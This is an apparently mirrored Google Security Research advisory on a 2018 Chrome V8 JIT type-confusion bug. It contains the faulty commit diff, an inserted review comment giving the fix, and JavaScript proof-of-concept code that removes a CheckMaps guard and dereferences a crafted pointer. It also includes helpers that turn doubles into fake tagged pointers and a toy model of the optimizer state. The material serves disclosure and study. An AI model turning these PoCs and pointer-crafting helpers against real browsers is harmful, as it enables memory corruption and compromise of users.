Google Chrome V8 JIT - 'LoadElimination::ReduceTransitionElementsKind' Type Confusion
Source: Google Security Research  Author: Google  Published: 2018-04-11
/*
I think this commit has introduced the bug: https://chromium.googlesource.com/v8/v8.git/+/9884bc5dee488bf206655f07b8a487afef4ded9b
 
Reduction LoadElimination::ReduceTransitionElementsKind(Node* node) {
...
     if (object_maps.contains(ZoneHandleSet<Map>(source_map))) {
       object_maps.remove(source_map, zone());
       object_maps.insert(target_map, zone());
-      AliasStateInfo alias_info(state, object, source_map);
-      state = state->KillMaps(alias_info, zone());
-      state = state->AddMaps(object, object_maps, zone());
+      state = state->SetMaps(object, object_maps, zone());
     }
...
}
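Review bot: the `state = state->KillMaps(alias_info, zone());` line removed in this hunk is what invalidated the recorded maps of every other node that may alias `object` with `source_map`; the replacement `state->SetMaps(object, object_maps, zone())` only rewrites the entry for `object` itself, so an aliased node keeps its pre-transition maps and a later `CheckMaps` on that node can be folded away as redundant. Keep the alias kill in front of the update:
      AliasStateInfo alias_info(state, object, source_map);
      state = state->KillMaps(alias_info, zone());
      state = state->SetMaps(object, object_maps, zone());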
 
I think the "state->KillMaps(alias_info, zone());" was accidentally removed. This omission may lead to CheckMap instructions being removed incorrectly.
 
A PoC demonstrating type confusion:
*/
 
// Run with: d8 --allow-natives-syntax poc.js
function opt(a, b) {
    b[0] = 0;            // records b's map(s) in the load-elimination state

    a.length;            // CheckMaps on a

    // TransitionElementsKind on a: a polymorphic store, since a was seen
    // as a holey object array (arr1) and a packed double array (arr2)
    for (let i = 0; i < 1; i++)
        a[0] = 0;

    // When a and b are the same array the transition above changed b's map
    // too, but the stale state still records b's old map, so the CheckMap
    // guarding this store is removed: type confusion. The double's raw
    // 64-bit pattern is 0x1234567.
    b[0] = 9.431092e-317;  // 0x1234567
}

let arr1 = new Array(1);
arr1[0] = 'a';           // HOLEY_ELEMENTS
opt(arr1, [0]);          // warm-up: a holey, b packed smi

let arr2 = [0.1];        // PACKED_DOUBLE_ELEMENTS
opt(arr2, arr2);         // warm-up: a and b are the same array

%OptimizeFunctionOnNextCall(opt);

opt(arr2, arr2);         // optimized call: a === b, CheckMap on b eliminated
arr2[0].x  // the raw bits are read back as a tagged pointer: access 0x1234566
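Added example, not part of the original PoC: helpers for the constant trick used above, where the double written into the array is chosen so that its raw IEEE-754 bits are the word the engine later misreads as a tagged pointer. It assumes a 64-bit V8 without pointer compression, where a heap pointer is a full 64-bit word with its low bit set to 1; the function names are mine.

```javascript
// Added example, not from the original report. Assumes 64-bit V8 without
// pointer compression: a tagged word with low bit 1 is a HeapObject pointer.

const f64 = new Float64Array(1);
const u64 = new BigUint64Array(f64.buffer); // the same 8 bytes viewed as an integer

// Raw 64-bit pattern of a double, as a BigInt.
function doubleToBits(x) {
  f64[0] = x;
  return u64[0];
}

// The double whose raw 64-bit pattern is `bits`.
function bitsToDouble(bits) {
  u64[0] = BigInt.asUintN(64, bits);
  return f64[0];
}

// If the word were read as a V8 tagged value: low bit 1 marks a HeapObject
// that starts one byte below the tagged value; low bit 0 is a Smi (null here).
function heapObjectAddress(bits) {
  return (bits & 1n) === 1n ? bits - 1n : null;
}

// The double to store so that a tagged read yields a pointer to `address`.
function doubleForHeapObjectAt(address) {
  return bitsToDouble(BigInt(address) | 1n);
}

// The PoC's constant: 9.431092e-317 is the denormal whose bits are 0x1234567,
// which a tagged read turns into a HeapObject at 0x1234566.
console.log('bits of 9.431092e-317:', doubleToBits(9.431092e-317).toString(16));
console.log('heap object at:', heapObjectAddress(doubleToBits(9.431092e-317)).toString(16));
console.log('double for object at 0x1234566:', doubleForHeapObjectAt(0x1234566));
```

The array holds unboxed doubles while the optimizer believes it is a double array, so whatever bit pattern `b[0] = <double>` stores becomes the raw element word; once the array is actually a tagged-element array, the same word is dereferenced as a pointer.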
 
Without natives syntax (no d8 flag needed; the long empty loop is there to get opt optimized without %OptimizeFunctionOnNextCall):
function opt(a, b) {
    b[0] = 0;

    a.length;

    // TransitionElementsKind
    for (let i = 0; i < 1; i++)
        a[0] = 0;

    // CheckMap removed when a and b alias, type confusion (raw bits 0x1234567)
    b[0] = 9.431092e-317;  // 0x1234567

    // Force optimization
    for (let i = 0; i < 10000000; i++) {

    }
}

let arr1 = new Array(1);
arr1[0] = 'a';           // HOLEY_ELEMENTS
opt(arr1, [0]);          // warm-up: a holey, b packed smi

let arr2 = [0.1];        // PACKED_DOUBLE_ELEMENTS
opt(arr2, arr2);         // warm-up: a and b are the same array

opt(arr2, arr2);         // optimized call: a === b
arr2[0].x  // access 0x1234566
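Added example, not V8 code and not part of the original report: a toy model of the per-object map state that LoadElimination tracks, replaying the body of opt(a, b) above with a and b aliased. It shows why dropping KillMaps from ReduceTransitionElementsKind lets the CheckMaps in front of the final store be eliminated. The map names, the alias oracle and the feedback maps assigned to a and b are assumptions read off the PoC's warm-up calls, not values taken from the engine.

```javascript
// Added example, not V8 code. Map names, alias oracle and feedback maps are
// assumptions read off the PoC above.

class MapState {
  constructor(entries = new Map()) {
    // object name -> Set of maps the object may have; absent means "unknown"
    this.entries = entries;
  }

  lookup(name) {
    return this.entries.get(name);
  }

  // SetMaps: record exactly these maps for one object, touching nothing else.
  setMaps(name, maps) {
    const next = new Map(this.entries);
    next.set(name, new Set(maps));
    return new MapState(next);
  }

  // KillMaps: forget the maps of every object that may alias `name`.
  killMaps(name, mayAlias) {
    const next = new Map();
    for (const [other, maps] of this.entries) {
      if (!mayAlias(name, other)) next.set(other, maps);
    }
    return new MapState(next);
  }
}

// A CheckMaps(object, expected) is redundant when the recorded state already
// proves every map the object may have is one of the expected maps.
function checkMapsIsRedundant(state, name, expected) {
  const known = state.lookup(name);
  return known !== undefined && [...known].every((m) => expected.has(m));
}

// Model of ReduceTransitionElementsKind. killAliases=true is the behaviour
// before the commit (KillMaps on everything that may alias, then record the
// new maps); killAliases=false is the code after the commit (SetMaps only).
function reduceTransitionElementsKind(state, name, sourceMap, targetMap, killAliases, mayAlias) {
  const known = state.lookup(name);
  if (known === undefined || !known.has(sourceMap)) return state;
  const objectMaps = new Set(known);
  objectMaps.delete(sourceMap);
  objectMaps.add(targetMap);
  const base = killAliases ? state.killMaps(name, mayAlias) : state;
  return base.setMaps(name, objectMaps);
}

// Replays opt(a, b) and returns true when the CheckMaps guarding the final
// store to b would be eliminated.
function finalCheckMapsOnBEliminated(killAliases) {
  // The compiler cannot prove a and b are distinct (in the PoC both are arr2).
  const mayAlias = (x, y) => x === y || (x === 'a' && y === 'b') || (x === 'b' && y === 'a');
  const bMaps = ['PACKED_SMI_ELEMENTS', 'PACKED_DOUBLE_ELEMENTS']; // b seen as [0] and arr2
  const aMaps = ['HOLEY_ELEMENTS', 'PACKED_DOUBLE_ELEMENTS'];      // a seen as arr1 and arr2

  let state = new MapState();
  state = state.setMaps('b', bMaps);   // b[0] = 0   -> CheckMaps(b) records bMaps
  state = state.setMaps('a', aMaps);   // a.length   -> CheckMaps(a) records aMaps
  // a[0] = 0 compiled as TransitionElementsKind(a): PACKED_DOUBLE -> HOLEY
  state = reduceTransitionElementsKind(
    state, 'a', 'PACKED_DOUBLE_ELEMENTS', 'HOLEY_ELEMENTS', killAliases, mayAlias);
  // b[0] = 9.431092e-317 -> CheckMaps(b, bMaps): is it still needed?
  return checkMapsIsRedundant(state, 'b', new Set(bMaps));
}

console.log('after the commit (SetMaps only): CheckMaps on b eliminated =',
  finalCheckMapsOnBEliminated(false));
console.log('with KillMaps kept:              CheckMaps on b eliminated =',
  finalCheckMapsOnBEliminated(true));
```

With the alias kill in place the transition on a wipes what the state knew about b, the CheckMaps stays, and at run time it deoptimizes because arr2 no longer has a packed-double map; without it the stale entry for b proves the check redundant and the double store lands in an array that now holds tagged pointers.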
 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved